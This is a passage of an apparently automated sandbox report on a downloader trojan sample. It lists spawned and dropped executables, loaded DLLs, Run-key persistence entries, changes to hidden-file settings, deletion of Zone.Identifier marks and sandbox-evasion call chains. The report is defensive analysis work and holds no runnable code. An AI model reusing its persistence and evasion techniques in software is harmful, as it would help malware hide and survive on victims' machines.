                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: h&?18_2_003F10A0
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCommand line argument: @'?18_2_003F10A0
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeReversingLabs: Detection: 78%
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe"
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeProcess created: C:\Windows\sysbrapsvc.exe C:\Windows\sysbrapsvc.exe
                            Source: unknownProcess created: C:\Windows\sysbrapsvc.exe "C:\Windows\sysbrapsvc.exe"
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\3193211493.exe C:\Users\user\AppData\Local\Temp\3193211493.exe
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\1146722911.exe C:\Users\user\AppData\Local\Temp\1146722911.exe
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess created: C:\Users\user\AppData\Local\Temp\2303012543.exe C:\Users\user\AppData\Local\Temp\2303012543.exe
                            Source: unknownProcess created: C:\Users\user\winploravr.exe "C:\Users\user\winploravr.exe"
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\2006625995.exe C:\Users\user\AppData\Local\Temp\2006625995.exe
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess created: C:\Users\user\AppData\Local\Temp\2711236308.exe C:\Users\user\AppData\Local\Temp\2711236308.exe
                            Source: unknownProcess created: C:\Windows\winploravr.exe "C:\Windows\winploravr.exe"
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\330125677.exe C:\Users\user\AppData\Local\Temp\330125677.exe
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess created: C:\Users\user\AppData\Local\Temp\1245832676.exe C:\Users\user\AppData\Local\Temp\1245832676.exe
                            Source: unknownProcess created: C:\Users\user\winploravr.exe "C:\Users\user\winploravr.exe"
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\300129380.exe C:\Users\user\AppData\Local\Temp\300129380.exe
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeProcess created: C:\Windows\sysbrapsvc.exe C:\Windows\sysbrapsvc.exeJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\3193211493.exe C:\Users\user\AppData\Local\Temp\3193211493.exeJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\1146722911.exe C:\Users\user\AppData\Local\Temp\1146722911.exeJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\2006625995.exe C:\Users\user\AppData\Local\Temp\2006625995.exeJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\330125677.exe C:\Users\user\AppData\Local\Temp\330125677.exeJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeProcess created: C:\Users\user\AppData\Local\Temp\300129380.exe C:\Users\user\AppData\Local\Temp\300129380.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess created: C:\Users\user\AppData\Local\Temp\2303012543.exe C:\Users\user\AppData\Local\Temp\2303012543.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess created: C:\Users\user\AppData\Local\Temp\2711236308.exe C:\Users\user\AppData\Local\Temp\2711236308.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess created: C:\Users\user\AppData\Local\Temp\1245832676.exe C:\Users\user\AppData\Local\Temp\1245832676.exeJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2501 push ecx; ret 7_2_00DB2514
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeCode function: 8_2_00B51741 push ecx; ret 8_2_00B51754
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A2501 push ecx; ret 9_2_002A2514
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D72EA1 push ecx; ret 10_2_00D72EB4
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeCode function: 13_2_00391741 push ecx; ret 13_2_00391754
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F2501 push ecx; ret 14_2_000F2514
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeCode function: 15_2_006F1751 push ecx; ret 15_2_006F1764
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeCode function: 16_2_00AE1741 push ecx; ret 16_2_00AE1754
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCode function: 18_2_003F1891 push ecx; ret 18_2_003F18A4

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeExecutable created and started: C:\Windows\sysbrapsvc.exeJump to behavior
                            Source: unknownExecutable created and started: C:\Windows\winploravr.exe
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeFile created: C:\Windows\sysbrapsvc.exeJump to dropped file
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\AppData\Local\Temp\2006625995.exeJump to dropped file
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\AppData\Local\Temp\330125677.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Windows\winploravr.exeJump to dropped file
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\AppData\Local\Temp\3193211493.exeJump to dropped file
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\AppData\Local\Temp\300129380.exeJump to dropped file
                            Source: C:\Windows\sysbrapsvc.exeFile created: C:\Users\user\AppData\Local\Temp\1146722911.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Users\user\AppData\Local\Temp\2711236308.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Users\user\AppData\Local\Temp\1245832676.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Users\user\winploravr.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Users\user\AppData\Local\Temp\2303012543.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Users\user\winploravr.exeJump to dropped file
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeFile created: C:\Windows\sysbrapsvc.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Windows\winploravr.exeJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile created: C:\Users\user\winploravr.exeJump to dropped file
                            Source: C:\Windows\sysbrapsvc.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows ServiceJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows ServiceJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows ServiceJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows ServiceJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\sysbrapsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValueJump to behavior
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeFile opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Windows\sysbrapsvc.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\3193211493.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\1146722911.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\1655423207.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\3109025629.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\2006625995.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\330125677.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeFile opened: C:\Users\user\AppData\Local\Temp\300129380.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Users\user\AppData\Local\Temp\1146722911.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Users\user\AppData\Local\Temp\2303012543.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Users\user\AppData\Local\Temp\2711236308.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Users\user\AppData\Local\Temp\1245832676.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeFile opened: C:\Users\user\AppData\Local\Temp\2006625995.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\winploravr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\winploravr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\winploravr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040D1A00_2_0040D1A0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040D1A02_2_0040D1A0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040D1A04_2_0040D1A0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040D1A05_2_0040D1A0
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                            Source: C:\Windows\sysbrapsvc.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-4374
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-4374
                            Source: C:\Windows\winploravr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                            Source: C:\Users\user\winploravr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                            Source: C:\Windows\winploravr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                            Source: C:\Windows\sysbrapsvc.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-4374
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-4374
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-303
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-303
                            Source: C:\Users\user\winploravr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeThread delayed: delay time: 900000Jump to behavior
                            Source: C:\Windows\sysbrapsvc.exeWindow / User API: threadDelayed 6126Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeEvaded block: after key decisiongraph_0-4400
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeEvaded block: after key decisiongraph_0-4376
                            Source: C:\Windows\sysbrapsvc.exeEvaded block: after key decisiongraph_4-4374
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeEvaded block: after key decisiongraph_5-4374
                            Source: C:\Users\user\winploravr.exeEvaded block: after key decision
                            Source: C:\Windows\winploravr.exeEvaded block: after key decision
                            Source: C:\Windows\sysbrapsvc.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_2-5787
                            Source: C:\Windows\sysbrapsvc.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-4405
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_7-311
                            Source: C:\Windows\winploravr.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-4404
                            Source: C:\Users\user\winploravr.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
